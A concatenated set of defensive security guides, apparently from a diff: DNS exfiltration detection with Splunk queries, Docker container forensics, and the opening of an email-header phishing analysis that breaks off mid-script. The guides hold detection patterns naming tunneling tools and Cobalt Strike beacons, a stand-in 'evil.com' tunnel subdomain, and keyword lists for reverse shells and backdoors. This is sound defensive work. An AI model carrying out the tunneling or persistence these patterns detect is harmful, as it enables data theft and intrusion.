| eval subdomain_len = len(subdomain_str)
|
||||
| eval tld = mvindex(domain_parts, -1)
|
||||
| eval registered_domain = mvindex(domain_parts, -2).".".tld
|
||||
| where subdomain_len > 50
|
||||
| stats count AS queries, dc(query) AS unique_queries,
|
||||
avg(subdomain_len) AS avg_subdomain_len,
|
||||
max(subdomain_len) AS max_subdomain_len,
|
||||
values(src_ip) AS sources
|
||||
by registered_domain
|
||||
| where queries > 20
|
||||
| sort - avg_subdomain_len
|
||||
| table registered_domain, queries, unique_queries, avg_subdomain_len, max_subdomain_len, sources
|
||||
```
|
||||
|
||||
### Step 2: Detect High-Entropy Domain Queries (DGA Detection)
|
||||
|
||||
Domain Generation Algorithms produce random-looking domains:
|
||||
|
||||
```spl
|
||||
index=dns sourcetype="stream:dns"
|
||||
| eval domain_parts = split(query, ".")
|
||||
| eval sld = mvindex(domain_parts, -2)
|
||||
| eval sld_len = len(sld)
|
||||
| eval char_count = sld_len
|
||||
| eval vowels = len(replace(sld, "[^aeiou]", ""))
|
||||
| eval consonants = len(replace(sld, "[^bcdfghjklmnpqrstvwxyz]", ""))
|
||||
| eval digits = len(replace(sld, "[^0-9]", ""))
|
||||
| eval vowel_ratio = if(char_count > 0, vowels / char_count, 0)
|
||||
| eval digit_ratio = if(char_count > 0, digits / char_count, 0)
|
||||
| where sld_len > 12 AND (vowel_ratio < 0.2 OR digit_ratio > 0.3)
|
||||
| stats count AS queries, dc(query) AS unique_domains, values(src_ip) AS sources
|
||||
by query
|
||||
| where unique_domains > 10
|
||||
| sort - queries
|
||||
```
|
||||
|
||||
**Python-based Shannon Entropy Calculation for DNS queries:**
|
||||
|
||||
```python
|
||||
import math
|
||||
from collections import Counter
|
||||
|
||||
def shannon_entropy(text):
|
||||
"""Calculate Shannon entropy of a string"""
|
||||
if not text:
|
||||
return 0
|
||||
counter = Counter(text.lower())
|
||||
length = len(text)
|
||||
entropy = -sum(
|
||||
(count / length) * math.log2(count / length)
|
||||
for count in counter.values()
|
||||
)
|
||||
return round(entropy, 4)
|
||||
|
||||
# Test with examples
|
||||
normal_domain = "google" # Low entropy
|
||||
dga_domain = "x8kj2m9p4qw7n" # High entropy
|
||||
tunnel_subdomain = "aGVsbG8gd29ybGQ.evil.com" # Base64 encoded data
|
||||
|
||||
print(f"Normal: {shannon_entropy(normal_domain)}") # ~2.25
|
||||
print(f"DGA: {shannon_entropy(dga_domain)}") # ~3.70
|
||||
print(f"Tunnel: {shannon_entropy(tunnel_subdomain)}") # ~3.50
|
||||
|
||||
# Threshold: entropy > 3.5 for subdomain = likely tunneling/DGA
|
||||
```
|
||||
|
||||
**Splunk implementation of entropy scoring:**
|
||||
|
||||
```spl
|
||||
index=dns sourcetype="stream:dns"
|
||||
| eval domain_parts = split(query, ".")
|
||||
| eval check_string = mvindex(domain_parts, 0)
|
||||
| eval check_len = len(check_string)
|
||||
| where check_len > 8
|
||||
| eval chars = split(check_string, "")
|
||||
| stats count AS total_chars, dc(chars) AS unique_chars by query, src_ip, check_string, check_len
|
||||
| eval entropy_estimate = log(unique_chars, 2) * (unique_chars / check_len)
|
||||
| where entropy_estimate > 3.5
|
||||
| stats count AS high_entropy_queries, dc(query) AS unique_queries by src_ip
|
||||
| where high_entropy_queries > 50
|
||||
| sort - high_entropy_queries
|
||||
```
|
||||
|
||||
### Step 3: Detect Anomalous DNS Query Volume
|
||||
|
||||
Identify hosts generating abnormal DNS traffic:
|
||||
|
||||
```spl
|
||||
index=dns sourcetype="stream:dns" earliest=-24h
|
||||
| bin _time span=1h
|
||||
| stats count AS queries, dc(query) AS unique_domains by src_ip, _time
|
||||
| eventstats avg(queries) AS avg_queries, stdev(queries) AS stdev_queries by src_ip
|
||||
| eval z_score = (queries - avg_queries) / stdev_queries
|
||||
| where z_score > 3 OR queries > 5000
|
||||
| sort - z_score
|
||||
| table _time, src_ip, queries, unique_domains, avg_queries, z_score
|
||||
```
|
||||
|
||||
**Detect TXT record abuse (common tunneling method):**
|
||||
|
||||
```spl
|
||||
index=dns sourcetype="stream:dns" query_type="TXT"
|
||||
| stats count AS txt_queries, dc(query) AS unique_txt_domains,
|
||||
values(query) AS domains by src_ip
|
||||
| where txt_queries > 100
|
||||
| eval suspicion = case(
|
||||
txt_queries > 1000, "CRITICAL — Likely DNS tunneling",
|
||||
txt_queries > 500, "HIGH — Possible DNS tunneling",
|
||||
txt_queries > 100, "MEDIUM — Unusual TXT volume"
|
||||
)
|
||||
| sort - txt_queries
|
||||
| table src_ip, txt_queries, unique_txt_domains, suspicion
|
||||
```
|
||||
|
||||
### Step 4: Detect Known DNS Tunneling Tools
|
||||
|
||||
Search for signatures of common DNS tunneling tools:
|
||||
|
||||
```spl
|
||||
index=dns sourcetype="stream:dns"
|
||||
| eval query_lower = lower(query)
|
||||
| where (
|
||||
match(query_lower, "\.dnscat\.") OR
|
||||
match(query_lower, "\.dns2tcp\.") OR
|
||||
match(query_lower, "\.iodine\.") OR
|
||||
match(query_lower, "\.dnscapy\.") OR
|
||||
match(query_lower, "\.cobalt.*\.beacon") OR
|
||||
query_type="NULL" OR
|
||||
(query_type="TXT" AND len(query) > 100)
|
||||
)
|
||||
| stats count by src_ip, query, query_type
|
||||
| sort - count
|
||||
```
|
||||
|
||||
**Detect DNS over HTTPS (DoH) bypassing local DNS:**
|
||||
|
||||
```spl
|
||||
index=proxy OR index=firewall
|
||||
dest IN ("1.1.1.1", "1.0.0.1", "8.8.8.8", "8.8.4.4",
|
||||
"9.9.9.9", "149.112.112.112", "208.67.222.222")
|
||||
dest_port=443
|
||||
| stats sum(bytes_out) AS total_bytes, count AS connections by src_ip, dest
|
||||
| where connections > 100 OR total_bytes > 10485760
|
||||
| eval alert = "Possible DoH bypass — DNS queries sent over HTTPS to public resolver"
|
||||
| sort - total_bytes
|
||||
```
|
||||
|
||||
### Step 5: Correlate DNS Findings with Endpoint Data
|
||||
|
||||
Cross-reference suspicious DNS with process data:
|
||||
|
||||
```spl
|
||||
index=dns src_ip="192.168.1.105" query="*.evil-tunnel.com" earliest=-24h
|
||||
| stats count AS dns_queries, earliest(_time) AS first_query, latest(_time) AS last_query
|
||||
by src_ip, query
|
||||
| join src_ip [
|
||||
search index=sysmon EventCode=3 DestinationPort=53 Computer="WORKSTATION-042"
|
||||
| stats count AS connections, values(Image) AS processes by SourceIp
|
||||
| rename SourceIp AS src_ip
|
||||
]
|
||||
| table src_ip, query, dns_queries, first_query, last_query, processes
|
||||
```
|
||||
|
||||
### Step 6: Calculate Data Exfiltration Volume Estimate
|
||||
|
||||
Estimate data volume encoded in DNS queries:
|
||||
|
||||
```spl
|
||||
index=dns src_ip="192.168.1.105" query="*.evil-tunnel.com" earliest=-24h
|
||||
| eval domain_parts = split(query, ".")
|
||||
| eval encoded_data = mvindex(domain_parts, 0)
|
||||
| eval encoded_bytes = len(encoded_data)
|
||||
| eval decoded_bytes = encoded_bytes * 0.75 -- Base64 decoding factor
|
||||
| stats sum(decoded_bytes) AS total_bytes_estimated, count AS total_queries,
|
||||
earliest(_time) AS first_seen, latest(_time) AS last_seen
|
||||
| eval estimated_kb = round(total_bytes_estimated / 1024, 1)
|
||||
| eval estimated_mb = round(total_bytes_estimated / 1048576, 2)
|
||||
| eval duration_hours = round((last_seen - first_seen) / 3600, 1)
|
||||
| eval rate_kbps = round(estimated_kb / (duration_hours * 3600) * 8, 2)
|
||||
| table total_queries, estimated_mb, duration_hours, rate_kbps, first_seen, last_seen
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|-----------|
|
||||
| **DNS Tunneling** | Technique encoding data within DNS queries/responses to exfiltrate data or establish C2 channels through DNS |
|
||||
| **DGA** | Domain Generation Algorithm — malware technique generating pseudo-random domain names for C2 resilience |
|
||||
| **Shannon Entropy** | Mathematical measure of randomness in a string — high entropy (>3.5) in domain names indicates DGA or tunneling |
|
||||
| **TXT Record Abuse** | Using DNS TXT records (designed for text data) as a high-bandwidth channel for data tunneling |
|
||||
| **DNS over HTTPS (DoH)** | DNS queries encrypted over HTTPS (port 443), bypassing traditional DNS monitoring |
|
||||
| **Passive DNS** | Historical record of DNS resolutions showing which IPs a domain resolved to over time |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Splunk Stream**: Network traffic capture add-on providing parsed DNS query data for SIEM analysis
|
||||
- **Zeek (Bro)**: Network security monitor generating detailed DNS transaction logs for analysis
|
||||
- **Cisco Umbrella (OpenDNS)**: Cloud DNS security platform blocking malicious domains and logging query data
|
||||
- **Infoblox DNS Firewall**: DNS-layer security providing RPZ-based blocking and detailed query logging
|
||||
- **Farsight DNSDB**: Passive DNS database for historical domain resolution lookups and infrastructure mapping
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
- **Cobalt Strike DNS Beacon**: Detect periodic TXT queries with encoded payloads to C2 domain
|
||||
- **Data Exfiltration**: Large volumes of unique subdomain queries encoding stolen data in Base64/hex
|
||||
- **DGA Malware**: Detect DNS queries to algorithmically generated domains (high entropy, no web content)
|
||||
- **DNS-over-HTTPS Bypass**: Employee using DoH to bypass corporate DNS filtering and monitoring
|
||||
- **Slow Drip Exfiltration**: Low-volume DNS tunneling staying below threshold alerts (requires baseline comparison)
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
DNS EXFILTRATION ANALYSIS — WORKSTATION-042
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
Period: 2024-03-14 to 2024-03-15
|
||||
Source: 192.168.1.105 (WORKSTATION-042, Finance Dept)
|
||||
|
||||
Findings:
|
||||
[CRITICAL] DNS tunneling detected to evil-tunnel[.]com
|
||||
Query Volume: 12,847 queries in 18 hours
|
||||
Avg Subdomain Len: 63 characters (normal: <20)
|
||||
Avg Entropy: 3.82 (threshold: 3.5)
|
||||
Query Types: TXT (89%), A (11%)
|
||||
Estimated Data: ~4.7 MB exfiltrated via DNS
|
||||
Rate: 0.58 kbps (slow drip pattern)
|
||||
|
||||
[HIGH] DGA-like domains resolved
|
||||
Unique DGA Domains: 247 domains resolved
|
||||
Pattern: 15-char random alphanumeric.xyz TLD
|
||||
Entropy Range: 3.6 - 4.1
|
||||
|
||||
Process Attribution:
|
||||
Process: svchost_update.exe (masquerading — not legitimate svchost)
|
||||
PID: 4892
|
||||
Parent: explorer.exe
|
||||
Hash: SHA256: a1b2c3d4... (VT: 34/72 malicious — Cobalt Strike beacon)
|
||||
|
||||
Containment:
|
||||
[DONE] Host isolated via EDR
|
||||
[DONE] Domain evil-tunnel[.]com added to DNS sinkhole
|
||||
[DONE] Incident IR-2024-0448 created
|
||||
```
|
||||
@@ -0,0 +1,329 @@
|
||||
---
|
||||
name: analyzing-docker-container-forensics
|
||||
description: Investigate compromised Docker containers by analyzing images, layers, volumes, logs, and runtime artifacts to identify malicious activity and evidence.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, docker, container-forensics, container-security, image-analysis, runtime-investigation]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Docker Container Forensics
|
||||
|
||||
## When to Use
|
||||
- When investigating a compromised Docker container or container host
|
||||
- For analyzing malicious Docker images pulled from registries
|
||||
- During incident response involving containerized application breaches
|
||||
- When examining container escape attempts or privilege escalation
|
||||
- For auditing container configurations and identifying misconfigurations
|
||||
|
||||
## Prerequisites
|
||||
- Docker CLI access on the forensic workstation
|
||||
- Access to the Docker host file system (forensic image or live)
|
||||
- Understanding of Docker layered file system (overlay2, aufs)
|
||||
- dive, docker-explorer, or container-diff for image analysis
|
||||
- Knowledge of Docker daemon configuration and socket security
|
||||
- Trivy or Grype for vulnerability scanning of container images
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Preserve Container State and Evidence
|
||||
|
||||
```bash
|
||||
# List all containers (including stopped)
|
||||
docker ps -a --no-trunc > /cases/case-2024-001/docker/container_list.txt
|
||||
|
||||
# Inspect the compromised container
|
||||
CONTAINER_ID="abc123def456"
|
||||
docker inspect $CONTAINER_ID > /cases/case-2024-001/docker/container_inspect.json
|
||||
|
||||
# Export container filesystem as tarball (preserves current state)
|
||||
docker export $CONTAINER_ID > /cases/case-2024-001/docker/container_export.tar
|
||||
|
||||
# Create an image from the container's current state
|
||||
docker commit $CONTAINER_ID forensic-evidence:case-2024-001
|
||||
docker save forensic-evidence:case-2024-001 > /cases/case-2024-001/docker/container_image.tar
|
||||
|
||||
# Capture container logs
|
||||
docker logs $CONTAINER_ID --timestamps > /cases/case-2024-001/docker/container_logs.txt 2>&1
|
||||
|
||||
# Capture running processes (if container is still running)
|
||||
docker top $CONTAINER_ID > /cases/case-2024-001/docker/container_processes.txt
|
||||
|
||||
# Capture network connections
|
||||
docker exec $CONTAINER_ID netstat -tlnp 2>/dev/null > /cases/case-2024-001/docker/container_network.txt
|
||||
|
||||
# Copy specific files from the container
|
||||
docker cp $CONTAINER_ID:/var/log/ /cases/case-2024-001/docker/container_var_log/
|
||||
docker cp $CONTAINER_ID:/tmp/ /cases/case-2024-001/docker/container_tmp/
|
||||
docker cp $CONTAINER_ID:/etc/passwd /cases/case-2024-001/docker/container_passwd
|
||||
|
||||
# Hash all exported evidence
|
||||
sha256sum /cases/case-2024-001/docker/*.tar > /cases/case-2024-001/docker/evidence_hashes.txt
|
||||
```
|
||||
|
||||
### Step 2: Analyze Container Image Layers
|
||||
|
||||
```bash
|
||||
# Install dive for image layer analysis
|
||||
wget https://github.com/wagoodman/dive/releases/latest/download/dive_linux_amd64.deb
|
||||
sudo dpkg -i dive_linux_amd64.deb
|
||||
|
||||
# Analyze image layers interactively
|
||||
dive forensic-evidence:case-2024-001
|
||||
|
||||
# Non-interactive layer analysis
|
||||
dive forensic-evidence:case-2024-001 --ci --json /cases/case-2024-001/docker/dive_analysis.json
|
||||
|
||||
# Extract and examine individual layers
|
||||
mkdir -p /cases/case-2024-001/docker/layers/
|
||||
tar -xf /cases/case-2024-001/docker/container_image.tar -C /cases/case-2024-001/docker/layers/
|
||||
|
||||
# List the image manifest and layer order
|
||||
cat /cases/case-2024-001/docker/layers/manifest.json | python3 -m json.tool
|
||||
|
||||
# Examine each layer for changes
|
||||
for layer in /cases/case-2024-001/docker/layers/*/layer.tar; do
|
||||
echo "=== Layer: $(dirname $layer | xargs basename) ==="
|
||||
tar -tf "$layer" | head -20
|
||||
echo "..."
|
||||
done
|
||||
|
||||
# Use container-diff to compare with original base image
|
||||
# Install container-diff
|
||||
curl -LO https://storage.googleapis.com/container-diff/latest/container-diff-linux-amd64
|
||||
chmod +x container-diff-linux-amd64
|
||||
|
||||
# Compare committed image with original
|
||||
./container-diff-linux-amd64 diff daemon://nginx:latest daemon://forensic-evidence:case-2024-001 \
|
||||
--type=file --type=apt --type=history --json \
|
||||
> /cases/case-2024-001/docker/container_diff.json
|
||||
```
|
||||
|
||||
### Step 3: Examine Docker Host Artifacts
|
||||
|
||||
```bash
|
||||
# Docker data directory (default: /var/lib/docker/)
|
||||
DOCKER_ROOT="/mnt/evidence/var/lib/docker"
|
||||
|
||||
# Examine overlay2 filesystem layers
|
||||
ls -la $DOCKER_ROOT/overlay2/
|
||||
|
||||
# Find the container's merged filesystem
|
||||
CONTAINER_HASH=$(docker inspect $CONTAINER_ID --format '{{.GraphDriver.Data.MergedDir}}' 2>/dev/null)
|
||||
# Or manually from forensic image:
|
||||
# Look in /var/lib/docker/containers/<container_id>/config.v2.json
|
||||
|
||||
# Analyze container configuration files
|
||||
cat $DOCKER_ROOT/containers/$CONTAINER_ID/config.v2.json | python3 -m json.tool \
|
||||
> /cases/case-2024-001/docker/container_config.json
|
||||
|
||||
# Check Docker daemon configuration
|
||||
cat /mnt/evidence/etc/docker/daemon.json 2>/dev/null > /cases/case-2024-001/docker/daemon_config.json
|
||||
|
||||
# Examine Docker events log
|
||||
cat $DOCKER_ROOT/containers/$CONTAINER_ID/*.log > /cases/case-2024-001/docker/container_json_logs.txt
|
||||
|
||||
# Check for volume mounts (potential host filesystem access)
|
||||
python3 << 'PYEOF'
|
||||
import json
|
||||
|
||||
with open('/cases/case-2024-001/docker/container_inspect.json') as f:
|
||||
data = json.load(f)
|
||||
|
||||
inspect = data[0] if isinstance(data, list) else data
|
||||
|
||||
print("=== CONTAINER SECURITY ANALYSIS ===\n")
|
||||
|
||||
# Check mounts
|
||||
print("Volume Mounts:")
|
||||
for mount in inspect.get('Mounts', []):
|
||||
rw = "READ-WRITE" if mount.get('RW') else "READ-ONLY"
|
||||
print(f" {mount.get('Source', 'N/A')} -> {mount.get('Destination', 'N/A')} ({rw})")
|
||||
if mount.get('Source') in ('/', '/etc', '/var', '/root') and mount.get('RW'):
|
||||
print(f" WARNING: Sensitive host path mounted read-write!")
|
||||
|
||||
# Check privileged mode
|
||||
host_config = inspect.get('HostConfig', {})
|
||||
if host_config.get('Privileged'):
|
||||
print("\nWARNING: Container was running in PRIVILEGED mode!")
|
||||
|
||||
# Check capabilities
|
||||
cap_add = host_config.get('CapAdd', [])
|
||||
if cap_add:
|
||||
print(f"\nAdded Capabilities: {cap_add}")
|
||||
dangerous_caps = ['SYS_ADMIN', 'SYS_PTRACE', 'NET_ADMIN', 'SYS_MODULE']
|
||||
for cap in cap_add:
|
||||
if cap in dangerous_caps:
|
||||
print(f" WARNING: Dangerous capability: {cap}")
|
||||
|
||||
# Check PID namespace
|
||||
if host_config.get('PidMode') == 'host':
|
||||
print("\nWARNING: Container shares host PID namespace!")
|
||||
|
||||
# Check network mode
|
||||
if host_config.get('NetworkMode') == 'host':
|
||||
print("\nWARNING: Container shares host network namespace!")
|
||||
|
||||
# Check user
|
||||
user = inspect.get('Config', {}).get('User', 'root (default)')
|
||||
print(f"\nRunning as user: {user}")
|
||||
|
||||
# Check environment variables for secrets
|
||||
env_vars = inspect.get('Config', {}).get('Env', [])
|
||||
print(f"\nEnvironment Variables: {len(env_vars)}")
|
||||
for env in env_vars:
|
||||
key = env.split('=')[0]
|
||||
if any(s in key.upper() for s in ['PASSWORD', 'SECRET', 'KEY', 'TOKEN', 'CREDENTIAL']):
|
||||
print(f" SENSITIVE: {key}=***REDACTED***")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 4: Analyze Container File System Changes
|
||||
|
||||
```bash
|
||||
# Compare container filesystem to original image
|
||||
docker diff $CONTAINER_ID > /cases/case-2024-001/docker/filesystem_changes.txt
|
||||
|
||||
# A = Added, C = Changed, D = Deleted
|
||||
# Analyze changes
|
||||
python3 << 'PYEOF'
|
||||
added = []
|
||||
changed = []
|
||||
deleted = []
|
||||
|
||||
with open('/cases/case-2024-001/docker/filesystem_changes.txt') as f:
|
||||
for line in f:
|
||||
line = line.strip()
|
||||
if line.startswith('A '):
|
||||
added.append(line[2:])
|
||||
elif line.startswith('C '):
|
||||
changed.append(line[2:])
|
||||
elif line.startswith('D '):
|
||||
deleted.append(line[2:])
|
||||
|
||||
print(f"Files Added: {len(added)}")
|
||||
print(f"Files Changed: {len(changed)}")
|
||||
print(f"Files Deleted: {len(deleted)}")
|
||||
|
||||
# Flag suspicious additions
|
||||
suspicious = [f for f in added if any(s in f for s in
|
||||
['/tmp/', '/dev/shm/', '/root/', '.sh', '.py', '.elf', 'reverse', 'shell', 'backdoor'])]
|
||||
if suspicious:
|
||||
print(f"\nSuspicious Added Files:")
|
||||
for f in suspicious:
|
||||
print(f" {f}")
|
||||
|
||||
# Flag suspicious changes
|
||||
sus_changed = [f for f in changed if any(s in f for s in
|
||||
['/etc/passwd', '/etc/shadow', '/etc/crontab', '/etc/ssh', '.bashrc'])]
|
||||
if sus_changed:
|
||||
print(f"\nSuspicious Changed Files:")
|
||||
for f in sus_changed:
|
||||
print(f" {f}")
|
||||
PYEOF
|
||||
|
||||
# Extract and examine the container export
|
||||
mkdir -p /cases/case-2024-001/docker/container_fs/
|
||||
tar -xf /cases/case-2024-001/docker/container_export.tar -C /cases/case-2024-001/docker/container_fs/
|
||||
|
||||
# Scan for webshells and malicious files
|
||||
find /cases/case-2024-001/docker/container_fs/tmp/ -type f -exec file {} \;
|
||||
find /cases/case-2024-001/docker/container_fs/ -name "*.php" -newer /cases/case-2024-001/docker/container_fs/etc/hostname
|
||||
```
|
||||
|
||||
### Step 5: Scan for Vulnerabilities and Generate Report
|
||||
|
||||
```bash
|
||||
# Scan the image for known vulnerabilities
|
||||
trivy image forensic-evidence:case-2024-001 \
|
||||
--format json \
|
||||
--output /cases/case-2024-001/docker/vulnerability_scan.json
|
||||
|
||||
# Scan the exported filesystem
|
||||
trivy fs /cases/case-2024-001/docker/container_fs/ \
|
||||
--format table \
|
||||
--output /cases/case-2024-001/docker/fs_vulnerabilities.txt
|
||||
|
||||
# Check for secrets in the image
|
||||
trivy image forensic-evidence:case-2024-001 \
|
||||
--scanners secret \
|
||||
--format json \
|
||||
--output /cases/case-2024-001/docker/secrets_scan.json
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| Image layers | Read-only filesystem layers stacked to form the container image |
|
||||
| overlay2 | Default Docker storage driver using union filesystem for layers |
|
||||
| Container diff | Comparison of runtime filesystem changes against the original image |
|
||||
| Privileged mode | Container with full host capabilities (bypasses most isolation) |
|
||||
| Docker socket | Unix socket (/var/run/docker.sock) controlling the Docker daemon |
|
||||
| Container escape | Technique for breaking out of container isolation to the host |
|
||||
| Volume mounts | Host filesystem paths made accessible inside the container |
|
||||
| Image history | Record of Dockerfile instructions used to build each layer |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| docker inspect | Detailed container configuration and state information |
|
||||
| docker diff | Show filesystem changes made in a running/stopped container |
|
||||
| dive | Interactive Docker image layer analysis tool |
|
||||
| container-diff | Google tool for comparing container image contents |
|
||||
| Trivy | Vulnerability scanner for container images and filesystems |
|
||||
| docker-explorer | Forensic tool for offline Docker artifact analysis |
|
||||
| Sysdig | Container runtime security monitoring and forensics |
|
||||
| Falco | Runtime threat detection for containers and Kubernetes |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Web Application Container Compromise**
|
||||
Export the container filesystem, identify webshells in web root, analyze access logs for exploitation attempts, check for added files and modified configurations, examine network connections for C2 communication, review container capabilities for escalation paths.
|
||||
|
||||
**Scenario 2: Supply Chain Attack via Malicious Image**
|
||||
Analyze image layers with dive to identify which layer added malicious content, compare with the official base image using container-diff, check image history for suspicious RUN commands, scan for embedded backdoors and cryptocurrency miners, trace the image pull from registry logs.
|
||||
|
||||
**Scenario 3: Container Escape Investigation**
|
||||
Check if container ran privileged or with dangerous capabilities, examine host filesystem mount points for unauthorized access, review Docker socket mount enabling Docker-in-Docker abuse, analyze host system logs for container escape indicators, check for kernel exploit artifacts.
|
||||
|
||||
**Scenario 4: Cryptojacking in Container Environment**
|
||||
Identify high-CPU containers, export and analyze the container image for mining binaries, check for unauthorized images in the registry, review container creation events for rogue deployments, examine network connections for mining pool communications.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Docker Container Forensics Summary:
|
||||
Container: abc123def456 (nginx-app)
|
||||
Image: company/web-app:v2.1
|
||||
Status: Running (started 2024-01-10 09:00 UTC)
|
||||
Host: docker-host-01.corp.local
|
||||
|
||||
Security Configuration:
|
||||
Privileged: No
|
||||
Capabilities Added: NET_ADMIN (WARNING)
|
||||
Volume Mounts: /var/log -> /host-logs (RW)
|
||||
Network Mode: bridge
|
||||
User: root (WARNING)
|
||||
|
||||
Filesystem Changes:
|
||||
Added: 23 files (5 suspicious)
|
||||
Changed: 12 files (2 suspicious)
|
||||
Deleted: 0 files
|
||||
|
||||
Suspicious Findings:
|
||||
/tmp/reverse.sh - Reverse shell script (Added)
|
||||
/var/www/html/.hidden/shell.php - PHP webshell (Added)
|
||||
/etc/crontab - Modified (persistence cron entry added)
|
||||
/root/.ssh/authorized_keys - Modified (unauthorized key added)
|
||||
|
||||
Vulnerability Scan:
|
||||
Critical: 3 (CVE-2024-xxxx in base image)
|
||||
High: 12
|
||||
Medium: 34
|
||||
|
||||
Evidence: /cases/case-2024-001/docker/
|
||||
```
|
||||
@@ -0,0 +1,312 @@
|
||||
---
|
||||
name: analyzing-email-headers-for-phishing-investigation
|
||||
description: Parse and analyze email headers to trace the origin of phishing emails, verify sender authenticity, and identify spoofing through SPF, DKIM, and DMARC validation.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, email-analysis, phishing, spf, dkim, dmarc, header-analysis]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Email Headers for Phishing Investigation
|
||||
|
||||
## When to Use
|
||||
- When investigating a suspected phishing email to determine its true origin
|
||||
- For verifying sender authenticity and detecting email spoofing
|
||||
- During incident response when a user has clicked a phishing link
|
||||
- When tracing the delivery path and relay servers of a suspicious email
|
||||
- For validating SPF, DKIM, and DMARC alignment to identify forgery
|
||||
|
||||
## Prerequisites
|
||||
- Raw email headers from the suspicious message (EML or MSG format)
|
||||
- Understanding of SMTP protocol and email header fields
|
||||
- Access to DNS lookup tools (dig, nslookup) for SPF/DKIM/DMARC verification
|
||||
- Email header analysis tools (MHA, emailheaders.net concepts)
|
||||
- Python with email parsing libraries for automated analysis
|
||||
- Access to threat intelligence platforms for IP/domain reputation
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Extract Raw Email Headers
|
||||
|
||||
```bash
|
||||
# Export from Outlook: Open email > File > Properties > Internet Headers
|
||||
# Export from Gmail: Open email > Three dots > Show original
|
||||
# Export from Thunderbird: View > Message Source
|
||||
|
||||
# If working with EML file from forensic image
|
||||
cp /mnt/evidence/Users/suspect/AppData/Local/Microsoft/Outlook/phishing_email.eml \
|
||||
/cases/case-2024-001/email/
|
||||
|
||||
# If working with PST file, extract individual messages
|
||||
pip install pypff
|
||||
python3 << 'PYEOF'
|
||||
import pypff
|
||||
|
||||
pst = pypff.file()
|
||||
pst.open("/cases/case-2024-001/email/outlook.pst")
|
||||
root = pst.get_root_folder()
|
||||
|
||||
def extract_messages(folder, path=""):
|
||||
for i in range(folder.get_number_of_sub_messages()):
|
||||
msg = folder.get_sub_message(i)
|
||||
headers = msg.get_transport_headers()
|
||||
subject = msg.get_subject()
|
||||
if headers:
|
||||
filename = f"/cases/case-2024-001/email/msg_{i}_{subject[:30]}.txt"
|
||||
with open(filename, 'w') as f:
|
||||
f.write(headers)
|
||||
for i in range(folder.get_number_of_sub_folders()):
|
||||
extract_messages(folder.get_sub_folder(i))
|
||||
|
||||
extract_messages(root)
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 2: Parse the Email Header Chain
|
||||
|
||||
```bash
|
||||
# Parse headers using Python email library
|
||||
python3 << 'PYEOF'
|
||||
import email
|
||||
from email import policy
|
||||
|
||||
with open('/cases/case-2024-001/email/phishing_email.eml', 'r') as f:
|
||||
msg = email.message_from_file(f, policy=policy.default)
|
||||
|
||||
print("=== KEY HEADER FIELDS ===")
|
||||
print(f"From: {msg['From']}")
|
||||
print(f"To: {msg['To']}")
|
||||
print(f"Subject: {msg['Subject']}")
|
||||
print(f"Date: {msg['Date']}")
|
||||
print(f"Message-ID: {msg['Message-ID']}")
|
||||
print(f"Reply-To: {msg['Reply-To']}")
|
||||
print(f"Return-Path: {msg['Return-Path']}")
|
||||
print(f"X-Mailer: {msg['X-Mailer']}")
|
||||
print(f"X-Originating-IP: {msg['X-Originating-IP']}")
|
||||
|
||||
print("\n=== RECEIVED HEADERS (bottom-up = chronological) ===")
|
||||
received_headers = msg.get_all('Received')
|
||||
if received_headers:
|
||||
for i, header in enumerate(reversed(received_headers)):
|
||||
print(f"\nHop {i+1}: {header.strip()}")
|
||||
|
||||
print("\n=== AUTHENTICATION RESULTS ===")
|
||||
auth_results = msg.get_all('Authentication-Results')
|
||||
if auth_results:
|
||||
for result in auth_results:
|
||||
print(result)
|
||||
|
||||
print(f"\nARC-Authentication-Results: {msg.get('ARC-Authentication-Results', 'Not present')}")
|
||||
print(f"Received-SPF: {msg.get('Received-SPF', 'Not present')}")
|
||||
print(f"DKIM-Signature: {msg.get('DKIM-Signature', 'Not present')}")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 3: Validate SPF, DKIM, and DMARC Records
|
||||
|
||||
```bash
|
||||
# Extract the envelope sender domain
|
||||
SENDER_DOMAIN="example-corp.com"
|
||||
|
||||
# Check SPF record
|
||||
dig TXT $SENDER_DOMAIN +short | grep "v=spf1"
|
||||
# Example: "v=spf1 include:_spf.google.com include:sendgrid.net ~all"
|
||||
|
||||
# Check DKIM record (selector from DKIM-Signature header, e.g., "s=selector1")
|
||||
DKIM_SELECTOR="selector1"
|
||||
dig TXT ${DKIM_SELECTOR}._domainkey.${SENDER_DOMAIN} +short
|
||||
|
||||
# Check DMARC record
|
||||
dig TXT _dmarc.${SENDER_DOMAIN} +short
|
||||
# Example: "v=DMARC1; p=reject; rua=mailto:dmarc@example-corp.com; pct=100"
|
||||
|
||||
# Verify the sending IP against SPF
|
||||
# Extract IP from first Received header
|
||||
SENDING_IP="203.0.113.45"
|
||||
|
||||
# Manual SPF check using python
|
||||
python3 << 'PYEOF'
|
||||
import spf # pip install pyspf
|
||||
|
||||
result, explanation = spf.check2(
|
||||
i='203.0.113.45',
|
||||
s='sender@example-corp.com',
|
||||
h='mail.example-corp.com'
|
||||
)
|
||||
print(f"SPF Result: {result}")
|
||||
print(f"Explanation: {explanation}")
|
||||
# Results: pass, fail, softfail, neutral, none, temperror, permerror
|
||||
PYEOF
|
||||
|
||||
